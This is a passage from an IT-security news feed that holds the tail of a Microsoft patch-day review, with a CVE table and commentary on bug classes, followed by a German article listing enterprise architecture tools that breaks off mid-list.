  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40413"><span>CVE-2026-40413</span></a></td>
  <td width="256" class="xl73">Windows TCP/IP Denial
  of Service Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-35422"><span>CVE-2026-35422</span></a></td>
  <td width="256" class="xl73">Windows TCP/IP Driver
  Security Feature Bypass Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34351"><span>CVE-2026-34351</span></a></td>
  <td width="256" class="xl73">Windows TCP/IP
  Elevation of Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40399"><span>CVE-2026-40399</span></a></td>
  <td width="256" class="xl73">Windows TCP/IP
  Elevation of Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34334"><span>CVE-2026-34334</span></a></td>
  <td width="256" class="xl73">Windows TCP/IP
  Elevation of Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40406"><span>CVE-2026-40406</span></a></td>
  <td width="256" class="xl73">Windows TCP/IP
  Information Disclosure Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33837"><span>CVE-2026-33837</span></a></td>
  <td width="256" class="xl73">Windows TCP/IP Local
  Elevation of Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40415"><span>CVE-2026-40415</span></a></td>
  <td width="256" class="xl73">Windows TCP/IP Remote
  Code Execution Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">8.1</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42825"><span>CVE-2026-42825</span></a></td>
  <td width="256" class="xl73">Windows Telephony
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34338"><span>CVE-2026-34338</span></a></td>
  <td width="256" class="xl73">Windows Telephony
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40382"><span>CVE-2026-40382</span></a></td>
  <td width="256" class="xl73">Windows Telephony
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40380"><span>CVE-2026-40380</span></a></td>
  <td width="256" class="xl73">Windows Volume Manager
  Extension Driver Remote Code Execution Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">6.2</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40408"><span>CVE-2026-40408</span></a></td>
  <td width="256" class="xl73">Windows WAN ARP Driver
  Elevation of Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34333"><span>CVE-2026-34333</span></a></td>
  <td width="256" class="xl73">Windows Win32k
  Elevation of Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34347"><span>CVE-2026-34347</span></a></td>
  <td width="256" class="xl73">Windows Win32k
  Elevation of Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-35417"><span>CVE-2026-35417</span></a></td>
  <td width="256" class="xl73">Windows Win32k
  Elevation of Privilege Vulnerability</td>
  <td class="xl70">Important</td>
  <td class="xl69">7.8</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42891"><span>CVE-2026-42891</span></a></td>
  <td width="256" class="xl73">Microsoft Edge
  (Chromium-based) for Android Spoofing Vulnerability</td>
  <td class="xl71">Moderate</td>
  <td class="xl69">6.5</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-35429"><span>CVE-2026-35429</span></a></td>
  <td width="256" class="xl73">Microsoft Edge
  (Chromium-based) for Android Spoofing Vulnerability</td>
  <td class="xl71">Moderate</td>
  <td class="xl69">4.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41107"><span>CVE-2026-41107</span></a></td>
  <td width="256" class="xl73">Microsoft Edge
  (Chromium-based) Information Disclosure Vulnerability</td>
  <td class="xl71">Moderate</td>
  <td class="xl69">7.4</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40416"><span>CVE-2026-40416</span></a></td>
  <td width="256" class="xl73">Microsoft
  Edge (Chromium-based) for Android Spoofing Vulnerability</td>
  <td class="xl72">Low</td>
  <td class="xl69">4.3</td>
  <td class="xl69">No</td>
  <td class="xl69">No</td>
  <td class="xl69">Spoofing</td>
 </tr>
 &lt;![if supportMisalignedColumns]&gt;
 <tr height="0">
  <td width="144"></td>
  <td width="256"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
  <td width="104"></td>
 </tr>
 &lt;![endif]&gt;
</table>











  
  









  <p class=""><em>* Indicates this CVE had been released by a third party and is now being included in Microsoft releases</em>.</p><p class=""><em>† Indicates further administrative actions are required to fully address the vulnerability.</em></p><p class=""><em> </em></p><p class="">Looking at the other Critical-rated bugs in this month’s release, there are quite a few scary-looking bugs (including a CVSS 10!), but there’s no action for the end user as Microsoft has already mitigated these bugs and is just now documenting them. There’s also this month’s crop of Office bugs where the Preview Pane is an attack vector. However, the bug in Office for Android does not have the Preview Pane vector; it’s simple open and own. The bug in the WiFi driver needs a network adjacent attacker. The SharePoint bug requires authentication, but anyone with site privileges has the authentication needed. The bug in SSO Plugin for Jira &amp; Confluence should really be called an authentication bypass, since it allows an unauthenticated attacker to gain access to a system.</p><p class="">Looking at the other code execution bugs, most are of the open and own variety as expected. The bug in Dynamic 365 (On Prem) requires high privileges. The Message Queueing bug requires an adjacent attacker. The bug in SQL Server requires authentication, but as usual, patching won’t be straightforward. Finally, there’s a bug in the kernel that leads to code execution. Most kernel bugs are privilege escalations, but this one could allow code execution if an attacker sends specially crafted NVMe over Fabrics (NVMe‑oF) response messages during the connection handshake process that contains an invalid header length value. Neat.</p><p class="">As usual, the vast majority of the Microsoft release fixes Elevation of Privilege (EoP) bugs. Also as usual, most simply lead to local attackers executing their code at SYSTEM-level privileges or administrative privileges, so there’s not much to add without further technical details about the bugs themselves. There are also a few bugs that just state the attacker could “gain ELEVATED privileges.” How obtuse. The bugs in Azure allow an attacker to access data otherwise hidden from them. The Edge bug allows threat actors to elevate to the privileges of the running application. The bug in Visual Studio allows attackers to get permissions associated with the MCP Server’s managed identity. Finally, there are a couple of sandbox escapes, too, which are always useful.</p><p class="">This month's update includes six Security Feature Bypass vulnerabilities. The most severe is in the Azure SDK for Java (CVSS 9.1). An attacker over the network can bypass the integrity protection provided by authentication tags on encrypted data, effectively manipulating encrypted input in a way that slips past integrity checks during decryption.  Close behind is the bypass affecting the GitHub Copilot integration in Visual Studio Code (CWE-74). This one requires a user interaction, but it allows an attacker to circumvent the path validation safeguards that normally control which files Copilot is permitted to modify. The other Visual Studio Code bypass involves cross-site scripting, improper link resolution, and information exposure triggered when a user opens or views a maliciously crafted notebook.  On the Windows networking side there are two bypasses. The first hits the Windows TCP/IP driver via an authentication bypass using an alternate channel. The other impacts the Windows Filtering Platform through improper access control, allowing a local, low-privileged attacker to bypass FQDN-based network security rules. Finally, there’s a Secure Boot bypass that, you guessed it, bypasses secure boot features.</p><p class="">Moving on to the Information Disclosure bugs fixed this month, we have 15 different CVEs. As usual, the majority of these simply result in info leaks consisting of unspecified memory contents or memory addresses. The bug in Power Automate could expose data marked “Sensitive” within Power Automate Desktop flows. One of the Word bugs could disclose NLTM hashes. The bug in Edge could disclose your cookies, which seems rude. The bug in Visual Studio could expose file path information. Finally, there’s a bug in Telnet for Windows 11 that leaks information being used by Telnet at the time. I didn’t even realize Windows 11 still had a telnet client.</p><p class="">The May release contains 10 spoofing bugs (plus the ones already addressed by Microsoft). The bug in Azure Machine Learning Notebooks vulnerability requires user interaction, but it could expose info through the Azure ML web interface to the attacker. There’s a cluster of fixes for Microsoft's mobile Office suite on Android. Excel, Word, and PowerPoint for Android all carry spoofing flaws rooted in improper access control. Two Copilot products are also affected by spoofing vulns. The M365 Copilot for Desktop has no details provided. The M365 Copilot for Android variant requires low privileges and producing only limited impact on confidentiality and integrity. Microsoft Teams for Android rounds out the mobile app spoofing bugs. Three Edge bugs close things out, all involving misrepresentation of information in the browser UI. </p><p class="">There are two Tampering bugs in this month’s release. The one in .NET Core allows threat actors to write files to an affected system. The other is in Outlook for iOS and manifests as a command injection bug.</p><p class="">There are eight DoS bugs in the May release, but as always, Microsoft provides little to no actionable information about the vulnerabilities. The most interesting from a practical standpoint are two TCP/IP bugs that allow a low-privilege Hyper-V guest to crash the host. Both are triggered from the adjacent network. On the broader network-exposure side, the ASP.NET Core bug is a straightforward infinite loop condition — an unauthenticated attacker sends a crafted request over the network and the server stops responding.</p><p class="">No new advisories are being released this month.</p><p class=""><strong>Looking Ahead</strong></p><p class="">Assuming I survive Pwn2Own Berlin (which is looking iffy at the moment), I’ll return on June 9th on what will hopefully be a smaller release than this one. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[18 Enterprise-Architecture-Tools]]></title>
<description><![CDATA[Diese Enterprise Architecture Tools unterstützen Sie nicht nur bei der digitalen Transformation Ihres Unternehmens. 
					Foto: I Believe I Can Fly – shutterstock.com




Enterprise Architecture (EA) Tools unterstützen Unternehmen und Organisationen dabei, mit ihren IT-Strategien die Geschäftszie...]]></description>
<link>https://tsecurity.de/de/3694429/it-security-nachrichten/18-enterprise-architecture-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694429/it-security-nachrichten/18-enterprise-architecture-tools/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Diese Enterprise Architecture Tools unterstützen Sie nicht nur bei der digitalen Transformation Ihres Unternehmens. " title="Diese Enterprise Architecture Tools unterstützen Sie nicht nur bei der digitalen Transformation Ihres Unternehmens. " src="https://images.computerwoche.de/bdb/3284195/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Diese Enterprise Architecture Tools unterstützen Sie nicht nur bei der digitalen Transformation Ihres Unternehmens. </p></figcaption></figure><p class="imageCredit">
					Foto: I Believe I Can Fly – shutterstock.com</p></div>




<p class="wp-block-paragraph"><a href="https://www.computerwoche.de/article/2789207/eam-gibt-orientierung-in-der-digitalen-transformation.html" title="Enterprise Architecture" target="_blank">Enterprise Architecture</a> (EA) Tools unterstützen Unternehmen und Organisationen dabei, mit ihren IT-Strategien die Geschäftsziele optimal zu unterstützen. Sie sorgen ebenfalls dafür, dass Unternehmen ihre Roadmaps für die <a href="https://www.computerwoche.de/article/2794425/wie-digitale-transformation-richtig-geht.html" title="digitale Transformation" target="_blank">digitale Transformation</a> geordnet vorantreiben können. EA Tools bieten dafür unter anderem Collaboration-, Reporting-, Testing- und Simulationsfunktionen. Mit deren Hilfe lassen sich Modelle implementieren, die Geschäfts- und IT-Prozesse gezielt verbessern.</p>



<p class="wp-block-paragraph">Um die beste Lösung für Ihr Unternehmen zu finden, sollten Sie zuerst prüfen, ob sich das jeweilige Tool mit Ihrem Technologie-Stack integrieren lässt. Anschließend gilt es abzuwägen, ob die Informationen, Diagramme und Tabellen, die die Software zur Verfügung stellt, für das Unternehmen auch einen echten Nutzwert haben.</p>



<h2 class="wp-block-heading">Empfehlenswerte Enterprise-Architecture-Tools</h2>



<p class="wp-block-paragraph">Nachfolgend finden Sie einen Überblick über die wichtigsten Enterprise-Architecture-Tools – in alphabetischer Reihenfolge. Sie stellen einen Mix aus Visualisierungs-, Collaboration- und Project-Management-Funktionen bereit und unterstützen eine Vielzahl von Enterprise Architecture Frameworks.</p>



<p class="wp-block-paragraph"><strong><a href="https://www.ardoq.com/" title="Ardoq" target="_blank" rel="noopener">Ardoq</a></strong></p>



<p class="wp-block-paragraph">Nachdem zuerst über einfache Formulare Informationen von Usern, Entwicklern und sonstigen Stakeholdern im Unternehmen eingesammelt wurden, lässt sich mithilfe von Ardoq ein digitaler Zwilling der gesamten Organisation erstellen. Der Ansatz setzt also darauf, die Menschen, die in ihren Rollen mit den verschiedensten Systemen arbeiten, realistisch in ihrer Arbeitswelt abzubilden.</p>



<p class="wp-block-paragraph">Jede Mitarbeiterin und jeder Mitarbeiter im Unternehmen kann später von den Netzwerkvisualisierungen und Datenfluss-Diagrammen profitieren, um seine eigene Rolle optimal zu unterstützen und den Arbeitsplatz immer wieder anzupassen und zu modernisieren. Das Tool lässt sich mit den wichtigsten Cloud-Plattformen integrieren. Es bietet eine API, die individuelle Anpassungen in allen wichtigen Programmiersprachen (Python, C#, Java, etc.) ermöglicht.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>“Architektonischen Stress” bei Lastspitzen simulieren, falls größere Veränderungen bevorstehen;</p></li>



<li><p>Verstehen, wie verändertes Nutzerverhalten neue Anforderungen generiert;</p></li>



<li><p>Application Portfolio Management, um besser strategisch zu planen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://atollgroup.eu/samu-enterprise-architecture-tool/" title="Atoll Group SAMU" target="_blank" rel="noopener">Atoll Group SAMU</a></strong></p>



<p class="wp-block-paragraph">Das EA-Tool SAMU macht die Enterprise Architecture sichtbar, indem es tiefe Verknüpfungen zwischen On-Premises-Systemen, dem Cloud-Layer und Tools für das Business Process Management aufzeigt. Das Tool der Atoll Group bietet vielfältige Integrationsmöglichkeiten, zum Beispiel mit Monitoring-Tools (etwa Tivoli, ServiceNow), Configuration-Management-Datenbanken (zum Beispiel CA, BMC) oder Service-Organisations-Tools (BMC, HPE). Alle Informationen fließen in ein zentrales Datenmodell ein, das um den zusätzlichen Input der Stakeholder weiter angereichert wird.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Enterprise-Architektur visualisieren;</p></li>



<li><p>strategische Planungsprozesse und Architektur-Reviews mit Informationen unterfüttern;</p></li>



<li><p>mithilfe einer visuellen Verständnisgrundlage die Kommunikation verbessern.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.avolutionsoftware.com/enterprise-architecture/" title="Avolution Abacus" target="_blank" rel="noopener">Avolution Abacus</a></strong></p>



<p class="wp-block-paragraph">Dieses Tool erfasst die Breite und den Umfang der Unternehmensarchitektur mit Hilfe eines auf Diagrammen basierenden Dashboards. Die Integration mit gängigen Tools wie SharePoint, <a href="https://www.computerwoche.de/k/excel,3461" target="_blank" class="idgGlossaryLink">Excel</a>, Visio, Google Sheets, Technopedia oder ServiceNow vereinfacht die Nutzung. Abacus wurde inzwischen auch um einen Machine-Learning-Layer ergänzt, der es Anwendern ermöglicht, ein Modell zu trainieren, das ihnen beispielsweise hilft zu erkennen, wer im Unternehmen für welches System verantwortlich ist.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>die IT für das gesamte Unternehmen “öffnen”, um ein allgemeines Verständnis der Datenflüsse zu erzeugen;</p></li>



<li><p>umfassendes Enterprise Modeling, um eine Roadmap für künftige Entwicklungen zu erstellen;</p></li>



<li><p>Business-Metriken tracken, die mit der Unternehmens-Performance zusammenhängen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.boc-group.com/de/adoit/" title="BOC Group ADOIT" target="_blank" rel="noopener">BOC Group ADOIT</a></strong></p>



<p class="wp-block-paragraph">ADOIT soll Teams dabei unterstützen, Ressourcen zu verwalten, Bedarfe vorherzusagen und Assets zu tracken. Dazu mappt das Tool jedes System oder Softwarepaket mit einem Objekt. Die Datenflüsse zwischen den Systemen werden in Beziehungen umgewandelt, die von diesen Objekten mithilfe eines anpassbaren Metamodells erfasst werden. Geschäftsprozesse können auf ähnliche Weise über ein gut integriertes Begleitprodukt namens ADONIS modelliert werden. ADOIT ist Web-basiert und lässt sich auch mit Tools wie Atlassian Confluence integrieren, um die Datenerfassung und -entwicklung zu beschleunigen.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>ein unternehmensweites Modell erstellen, das bei sämtlichen Teammitgliedern ein Verständnis über den Stack schafft – und wie man diesen verbessern kann;</p></li>



<li><p>vollständiger Zugriff auf EA-Daten über eine Mobile-Anwendung;</p></li>



<li><p>bei Fusionen und Übernahmen den Tech-Bereich durch genaues Asset-Mapping orchestrieren.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a title="Mega Hopex" href="https://www.mega.com/hopex-platform" target="_blank" rel="noopener">Bizzdesign Hopex</a></strong></p>



<p class="wp-block-paragraph">Nach der Übernahme von Mega International zählt die Hopex-Plattform zum Portfolio von Bizzdesign. Sie soll dabei unterstützen, Unternehmensanwendungen zu modellieren und dabei ein Verständnis der von ihnen unterstützten Geschäfts-Workflows schaffen. Dabei liegt ein Schwerpunkt auf den Bereichen Data Governance und Risikomanagement. Hopex basiert auf Microsoft <a class="idgGlossaryLink" href="https://www.computerwoche.de/article/2732704/microsoft-azure-mit-der-deutschen-cloud-zu-neuen-geldquellen.html" target="_blank">Azure</a> und stützt sich auf eine Reihe offener Standards wie GraphQL und REST Queries, um Informationen aus Komponentensystemen zu sammeln. Das Reporting ist mit den Office-Tools von Microsoft sowie mit grafischen Lösungen wie Tableau und Qlik integriert.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>datengestützte Erkenntnisse herbeiführen, um Cloud- und Anwendungsbereitstellung zu steuern;</p></li>



<li><p>akkurate Nutzungsmodelle erstellen, um Architekturanforderungen zu verstehen;</p></li>



<li><p>eine Bedarfsschätzung mit Umfragen und anderen Tools vornehmen, um für die Zukunft zu planen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://bizzdesign.com/transformation-suite/horizzon" target="_blank" rel="noreferrer noopener">Bizzdesign Horizzon</a></strong></p>



<p class="wp-block-paragraph">Das Tool dient dazu, Business Workflows und den zugrundeliegenden Tech-Stack zu modellieren. Dazu bietet Horizzon ein Graph-basiertes Modell, das Daten von sämtlichen Stakeholdern einsammelt und diese an eine Analytics-Engine weitergibt. Im Ergebnis entstehen Diagramme, die den aktuellen Systemzustand widerspiegeln. Wichtige Schwerpunkte dieses Tools sind <a class="idgGlossaryLink" href="https://www.computerwoche.de/article/2777492/was-sie-ueber-change-management-wissen-muessen.html" target="_blank">Change Management</a> und Zukunftsplanung: Horizzon ist nicht zuletzt dafür konzipiert worden, die Risiken eines Redesigns zu minimieren. Das Toolset unterstützt die wichtigsten Frameworks ArchiMate, TOGAF und BPMN. Neben Mega hat Bizzdesign <a href="https://bizzdesign.com/press-releases/bizzdesign-adds-alfabet-business-following-successful-closing-mega-international" target="_blank" rel="noreferrer noopener">im Januar 2025</a> auch den EA-Geschäftsbereich der Software AG – Alfabet – übernommen.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Vorhersage zukünftiger Anforderungen durch Predictive Modeling;</p></li>



<li><p>Orchestrieren von Workflows auf der Basis der technischen und der Business-Architektur;</p></li>



<li><p>Antizipieren von Risiken sowie Security- und Governance-Problemen durch die Modellierung von Datensicherheitsanforderungen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.capstera.com/" target="_blank" rel="noreferrer noopener">Capstera</a></strong></p>



<p class="wp-block-paragraph">Das Tool von Capstera fokussiert darauf, die Business Architecture selbst abzubilden. Value und Process Maps helfen dabei, die Rollen der verschiedenen Unternehmensbereiche zu definieren und nachzuverfolgen. Dabei können im laufenden Prozess Verknüpfungen mit den zugrundeliegenden Softwarprodukten und Tools hinzugefügt werden.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Reports erstellen, die sich erst einmal mit der Business-Architektur selbst beschäftigen;</p></li>



<li><p>Beziehungen zwischen Menschen, Abteilungen und Rollen analysieren;</p></li>



<li><p>die langfristige strategische Planung vorantreiben.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.bee360.com/de/" title="Clausmark Bee360" target="_blank" rel="noopener">Clausmark Bee360</a></strong></p>



<p class="wp-block-paragraph">Teammitglieder, die Clausmarks Flaggschiffprodukt Bee360 (früher Bee4IT) verwenden, wollen eine einfache “Single Source of Truth” über die Workflows im Unternehmen. Ziel ist es, verschiedenen betrieblichen Rollen intelligentere Entscheidungen zu ermöglichen. Das Modul Bee360 FM (Finanzmanagement) bietet etwa die Möglichkeit, Kosten nachzuvollziehen und zuzuordnen. Die Anwender können verschiedene solcher Module miteinander verknüpfen, um EAM, Finanzmanagement, Portfolio Management und Agile Planning nahtlos zu integrieren – bei maximaler Transparenz. </p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>C-Suite-Ebene befähigen, Projekte zu managen und Assets zuzuweisen;</p></li>



<li><p>präzise digitale Zwillinge entwickeln, um ein Verständnis über Datenflüsse zu schaffen und künftige Erweiterungen zu planen;</p></li>



<li><p>integrierte Wissensdatenbank aufbauen, um alle digitalen Workflows zu tracken.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.enterprise-architecture.com/" title="EAS" target="_blank" rel="noopener">EAS</a></strong></p>



<p class="wp-block-paragraph">Das Essential-Paket von EAS (Enterprise Architecture Solutions) nahm als <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Open-Source</a>-Projekt seinen Anfang und hat sich inzwischen zu einer kommerziell verfügbaren Cloud-Lösung weiterentwickelt. Das Tool erstellt ein Metamodell, das die Interaktionen zwischen Systemen und Geschäftsprozessen beschreibt. Ebenfalls enthalten sind Pakete, um gängige Business Workflows wie Datenmanagement oder DSGVO-Compliance zu tracken.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>den technischen Reifegrad der eigenen Architektur evaluieren;</p></li>



<li><p>Sicherheit und Governance durch besseres Asset Tracking optimieren;</p></li>



<li><p>wachsende Systemkomplexität kontrollieren und managen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a title="Orbus Software iServer" href="https://www.orbussoftware.com/" target="_blank" rel="noopener">OrbusInfinity</a></strong></p>



<p class="wp-block-paragraph">Orbus Software hat Anfang 2025 die Akquisition seines Konkurrenten Capsifi <a href="https://www.orbussoftware.com/landing-pages/events/webinars/unlocking-the-future-orbus-acquires-capsifi-a-new-era-of-innovation-partnership-apac" target="_blank" rel="noreferrer noopener">abgeschlossen</a>. Der Anbieter stellt mit OrbusInfinity eine Enterprise-Transformation-Plattform auf KI-Basis zur Verfügung,  die schnellere, bessere Entscheidungen, Kosteinesparungen und Risikominimierung verspricht. Architecture-Teams sollen mit Hifle von OrbusInfinity mit einer Vielzahl von Stakeholdern interagieren können, um eine “digitale Blaupause” ihres Unternehmens zu generieren, die eine einheitliche Sicht auf das aktuelle und künftige Geschäft realisieren soll. Diverse Drittanbieter-Tools lassen sich außerdem mit der Plattform <a href="https://www.orbussoftware.com/product/integrations" target="_blank" rel="noreferrer noopener">integrieren</a>, darunter etwa von Microsoft, Flexera, ManageEngine oder ServiceNow. </p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>Stakeholder-Management;</p></li>



<li><p>Enterprise-Landschaften visualisieren;</p></li>



<li><p>Entscheidungsfindung und Datenanalyse automatisieren.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.planview.com/de/" title="Planview Enterprise One" target="_blank" rel="noopener">Planview Enterprise One</a></strong></p>



<p class="wp-block-paragraph">Planview bietet eine ganze Reihe von Produkten, mit denen Unternehmen Teamwork, Prozesse und die Enterprise Architecture nachvollziehen können. Die Enterprise Tools sind in drei Kategorien unterteilt: strategisches Portfolio-Management, Produktportfolio-Management und Projektportfolio-Management. Im Zusammenspiel entstehen hardware- und Software-übergreifende Layer, die rollenbasierte Perspektiven für Führungskräfte und Teammitglieder eröffnen. Das Toolset integriert mit gängigen Ticket-Tracking-Systemen wie Jira, um Workflow-Analysen und Reports zu erstellen. Inzwischen hat Planview nach einer Übernahme neue Tools in sein Portfolio integriert, die früher unter den Namen Daptiv, Barometer und Projectplace bekannt waren.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>eine langfristige, strategische Vision für die Architekturentwicklung aufbauen;</p></li>



<li><p>Entwicklungsarbeit auf Projektebene tracken und in eine beliebige Strategie integrieren;</p></li>



<li><p>mit Fokus auf die Customer Experience und die Produktstruktur den Change vorantreiben.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://www.qualiware.com/" title="QualiWare Enterprise Architecture" target="_blank" rel="noopener">QualiWare Enterprise Architecture</a></strong></p>



<p class="wp-block-paragraph">Das Enterprise Architecture Tool von QualiWare ist Teil einer größeren Sammlung von Modellierungswerkzeugen, die darauf abzielt, sämtliche Geschäftsprozesse zu erfassen. Beispielsweise ist es möglich, einen digitalen Zwillinge zu bauen, mit dem sich Customer Journeys nachvollziehen lassen. Qualiware hat diverse KI-Algorithmen integriert, um Dokumentation und Process Discovery zu optimieren.</p>



<p class="wp-block-paragraph"><em>Wichtigste Use Cases:</em></p>



<ul class="wp-block-list">
<li><p>ein kollaboratives Ökosystem für Business Manager aufbauen, das ein Verständnis von der Enterprise Architecture vermittelt;</p></li>



<li><p>architektonische Designelemente erfassen, um ein Wissens-Ökosystem rund um den Stack aufzubauen;</p></li>



